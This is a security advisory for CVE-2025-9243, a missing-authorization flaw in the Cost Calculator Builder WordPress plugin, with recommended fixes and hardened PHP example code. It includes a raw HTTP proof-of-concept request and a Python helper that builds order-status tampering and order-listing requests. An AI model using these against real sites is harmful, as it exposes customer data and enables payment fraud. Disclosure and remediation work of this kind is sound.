Cost Calculator Builder (v3.5.24; the issue affects all versions up to and including 3.5.32) is a popular WordPress plugin (50 000+ active installations) that lets site owners build customizable pricing calculators and capture form-based orders. It exposes two AJAX endpoints, get_cc_orders to list orders and update_order_status to change an order's status, that rely solely on nonces injected into the page as window.ccb_nonces. The handlers perform no current_user_can() check, so any low-privileged user who can read those nonces (the Wordfence classification is authenticated, Subscriber level and above) can list every order, including customer names and email addresses, and mark payments as complete, canceled, rejected, or pending at will.
| Field | Value |
|---|---|
| CVE | CVE-2025-9243 |
| Plugin Version | Cost Calculator Builder <= 3.5.32 |
| Severity | High |
| All-time downloads | 2 701 355 |
| Active installations | 50 000+ |
| Publicly Published | October 9, 2025 |
| Last Updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9243 ; https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cost-calculator-builder/cost-calculator-builder-3532-authenticated-subscriber-missing-authorization-via-get-cc-ordersupdate-order-status-functions |
Timeline
| Date | Event |
|---|---|
| August 22, 2025 | Plugin testing and vulnerability detection in the Cost Calculator Builder have been completed |
| August 22, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 9, 2025 | Registered CVE-2025-9243 |
Discovery of the Vulnerability
A security review showed that both AJAX actions are registered with add_action('wp_ajax_...') and add_action('wp_ajax_nopriv_...'), but their callbacks only call wp_verify_nonce( $_POST['nonce'], 'ccb_orders' ) or wp_verify_nonce( $_POST['nonce'], 'ccb_update_order' ); neither checks the caller's capabilities. A nonce is a CSRF token, not an authorization decision: WordPress issues one for any session, and the plugin writes its tokens into window.ccb_nonces on public pages as well as admin ones. A low-privileged account (the PoC below uses a Subscriber and reads the token from the profile page) can therefore extract the tokens and invoke the order actions through admin-ajax.php.
Understanding missing-authorization flaws
WordPress needs both checks on an AJAX handler: a nonce, which defends against CSRF by proving the request was issued from a page the site rendered for that session, and a capability check via current_user_can(), which enforces role-based access. A nonce says nothing about the session's role, so omitting the capability check, especially when the nonces are written into pages that low-privileged users can load, effectively hands those users administrator-level actions. The same pattern has appeared in other plugins (CVE-2025-9202 in ColorMag, CVE-2025-11705 in Anti-Malware Security), leading to data leakage and business-logic manipulation. CVE-2025-9243 repeats it: unprivileged users can read customer data and tamper with the order workflow.
Exploiting the missing-authorization vulnerability
To exploit CVE-2025-9243, an attacker holding Subscriber-level session cookies and a valid nonce (in the PoC the nonce is read from window.ccb_nonces on the profile page) sends the following request to admin-ajax.php. The data parameter is base64 of the percent-encoded JSON {"ids":"2","status":"complete"}, so order 2 is marked complete.
POC:

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 125
Origin: http://127.0.0.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Subscriber+ Cookies
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=update_order_status&nonce=NONCE_FROM_PROFILE.php&data=JTdiJTIyaWRzJTIyJTNhJTIyMiUyMiUyYyUyMnN0YXR1cyUyMiUzYSUyMmNvbXBsZXRlJTIyJTdk
```

For testing, first create an order in the database:

```sql
INSERT INTO wp_cc_orders (calc_id, calc_title, status, order_details, form_details, promocodes, created_at, updated_at)
VALUES (2, 'Test Calculator', 'pending',
        '[{"alias":"text_field_id_1","label":"Text","value":"Sample","options":null}]',
        '{"fields":[{"name":"name","value":"John Doe"},{"name":"email","value":"us**@*****le.com"}]}',
        '[]', NOW(), NOW());
SELECT * FROM wp_cc_orders;
```
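As an added example that is not part of the original PoC, the following Python shows what the request above actually carries: the data parameter is base64 of a percent-encoded JSON object, here {"ids":"2","status":"complete"}, and the script rebuilds the same request for another order or status so the two endpoints can be exercised against a test site. It constructs requests offline and never sends them; the nonce value and the admin-ajax.php path are placeholders, and the single-id payload shape follows the PoC (the multi-order format is not known from this page).

```python
import base64
import json
from urllib.parse import parse_qs, quote, unquote, urlencode

# data= value copied from the PoC request above: it targets the test row
# created by the INSERT statement (ids "2") and sets it to "complete".
POC_DATA = "JTdiJTIyaWRzJTIyJTNhJTIyMiUyMiUyYyUyMnN0YXR1cyUyMiUzYSUyMmNvbXBsZXRlJTIyJTdk"

# Status values the advisory says update_order_status accepts.
STATUSES = ("complete", "canceled", "rejected", "pending")

# Placeholder (assumption): a real run needs the token read from window.ccb_nonces.
NONCE_PLACEHOLDER = "NONCE_FROM_PROFILE"


def decode_order_payload(blob: str) -> dict:
    """Reverse the client-side encoding: base64 -> percent-encoded text -> JSON."""
    percent_encoded = base64.b64decode(blob, validate=True).decode("utf-8")
    return json.loads(unquote(percent_encoded))


def encode_order_payload(order_id, status: str) -> str:
    """Build a data= value of the same shape for another order id / status.

    The PoC carries the id as a string under the key "ids"; this keeps that
    shape and does not guess at a multi-id format.
    """
    if status not in STATUSES:
        raise ValueError(f"unknown status {status!r}")
    body = json.dumps({"ids": str(order_id), "status": status}, separators=(",", ":"))
    # quote() emits uppercase hex (%7B); the PoC used lowercase, which a
    # server-side rawurldecode() treats identically.
    return base64.b64encode(quote(body, safe="").encode("utf-8")).decode("ascii")


def build_update_request(nonce: str, order_id, status: str) -> dict:
    """Assemble the update_order_status POST as path, headers and form body."""
    form = {
        "action": "update_order_status",
        "nonce": nonce,
        "data": encode_order_payload(order_id, status),
    }
    return _ajax_request(form)


def build_list_request(nonce: str) -> dict:
    """Assemble the get_cc_orders POST that lists every stored order."""
    return _ajax_request({"action": "get_cc_orders", "nonce": nonce})


def _ajax_request(form: dict) -> dict:
    # Path is generic; the PoC site lived under /wordpress/.
    return {
        "method": "POST",
        "path": "/wp-admin/admin-ajax.php",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
        },
        "body": urlencode(form),
    }


def parse_form_body(body: str) -> dict:
    """Flatten a form-encoded body back to single values (for inspection)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


if __name__ == "__main__":
    print("PoC data decodes to:", decode_order_payload(POC_DATA))
    req = build_update_request(NONCE_PLACEHOLDER, 2, "rejected")
    print(req["body"])
```

The request dictionaries can be handed to any HTTP client together with the Subscriber's session cookie; the point of the script is that the only secret the attacker needs is the nonce, which is exactly the value the plugin exposes.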
Data Exposure: Attackers harvest customer names, emails, and order details—violating privacy and GDPR regulations.
Financial Fraud: Malicious actors can mark orders as “complete” to trigger fulfillment or “rejected” to block genuine purchases.
Business Disruption: Automated bots could toggle payment statuses unpredictably, leading to shipping errors, refunds, or lost revenue.
Integrity Loss: Order history becomes unreliable, preventing accurate reporting and reconciliation.
Recommendations for Improved Security
Capability Enforcement: In both AJAX handlers, add if ( ! current_user_can( 'manage_options' ) ) wp_send_json_error( 'Unauthorized' );.
Restrict Nonce Exposure: Only inject ccb_nonces on admin pages, not publicly.
Separate Nonces per Action: Use distinct, action-specific nonces and verify them via check_ajax_referer().
Audit AJAX Routes: Ensure all state-changing AJAX actions require both a valid nonce and appropriate capabilities.
Logging & Alerts: Record each action with user IP and timestamp, and alert site administrators on unexpected status changes.
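The handler shape described in the discovery section and a hardened counterpart that applies the recommendations above, as added illustrative code: this is not the plugin's source and not the fix shipped by its author. The nonce action names 'ccb_orders' and 'ccb_update_order', the ccb_example_ helper names, the admin page hook string, the script handle and an auto-increment id column in wp_cc_orders are assumptions.

```php
<?php
/* Added example, not the plugin's code. Assumed names: nonce actions
 * 'ccb_update_order' / 'ccb_orders', ccb_example_* helpers, the admin
 * page hook string, the 'ccb-admin' handle and an `id` column in wp_cc_orders. */

/* --- Vulnerable shape: reachable by anyone who holds the nonce. --- */

add_action( 'wp_ajax_update_order_status', 'ccb_example_vulnerable_update' );
add_action( 'wp_ajax_nopriv_update_order_status', 'ccb_example_vulnerable_update' );

function ccb_example_vulnerable_update() {
	// A nonce only proves the request came from a page rendered for this
	// session; it says nothing about the session's role.
	if ( ! wp_verify_nonce( $_POST['nonce'] ?? '', 'ccb_update_order' ) ) {
		wp_send_json_error( 'Invalid nonce' );
	}
	ccb_example_apply_status( ccb_example_decode( $_POST['data'] ?? '' ) );
	wp_send_json_success();
}

/* --- Hardened shape. --- */

// No wp_ajax_nopriv_ registration: anonymous callers get WordPress's default "0".
add_action( 'wp_ajax_update_order_status', 'ccb_example_hardened_update' );

function ccb_example_hardened_update() {
	// 1. Action-specific nonce; check_ajax_referer() dies on failure.
	check_ajax_referer( 'ccb_update_order', 'nonce' );

	// 2. Authorization: the role check the original handler lacked.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( 'Unauthorized', 403 );
	}

	// 3. Decode and validate the payload before touching the database.
	$payload = ccb_example_decode( $_POST['data'] ?? '' );
	$allowed = array( 'pending', 'complete', 'canceled', 'rejected' );
	if ( null === $payload || ! in_array( $payload['status'], $allowed, true ) ) {
		wp_send_json_error( 'Invalid payload', 400 );
	}

	$updated = ccb_example_apply_status( $payload );

	// 4. Audit trail: who changed what, from where.
	error_log( sprintf(
		'ccb: user %d from %s set order %d to %s',
		get_current_user_id(),
		sanitize_text_field( $_SERVER['REMOTE_ADDR'] ?? '' ),
		$payload['id'],
		$payload['status']
	) );

	wp_send_json_success( array( 'updated' => $updated ) );
}

/* Reverse the client encoding seen in the PoC: base64 of percent-encoded
 * JSON {"ids":"<id>","status":"<status>"}. Returns null on malformed input. */
function ccb_example_decode( $blob ) {
	$raw  = base64_decode( wp_unslash( $blob ), true );
	$json = is_string( $raw ) ? json_decode( rawurldecode( $raw ), true ) : null;
	if ( ! is_array( $json ) || ! isset( $json['ids'], $json['status'] ) ) {
		return null;
	}
	return array(
		'id'     => absint( $json['ids'] ),
		'status' => sanitize_text_field( $json['status'] ),
	);
}

/* Write the status with a prepared UPDATE; returns the number of rows changed. */
function ccb_example_apply_status( $payload ) {
	global $wpdb;
	if ( null === $payload || 0 === $payload['id'] ) {
		return 0;
	}
	return (int) $wpdb->update(
		$wpdb->prefix . 'cc_orders',
		array( 'status' => $payload['status'], 'updated_at' => current_time( 'mysql' ) ),
		array( 'id' => $payload['id'] ),
		array( '%s', '%s' ),
		array( '%d' )
	);
}

/* --- Nonce exposure: create the tokens only on the plugin's admin screen. --- */

add_action( 'admin_enqueue_scripts', function ( $hook ) {
	if ( 'toplevel_page_cost_calculator_builder' !== $hook ) { // hook string assumed
		return;
	}
	wp_localize_script( 'ccb-admin', 'ccb_nonces', array( // handle assumed
		'orders'       => wp_create_nonce( 'ccb_orders' ),
		'update_order' => wp_create_nonce( 'ccb_update_order' ),
	) );
} );
```

Two design points: the capability check runs after the nonce check but before any input is parsed, so an unauthorized caller learns nothing about the payload format from error messages, and the allowed-status list rejects anything the workflow does not define, which also blocks stray values from reaching $wpdb->update().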
By proactively addressing missing-authorization flaws like CVE-2025-9243, WordPress site owners can improve their security posture and protect themselves against exploitation. Stay vigilant, stay secure.
Dmitrii I.
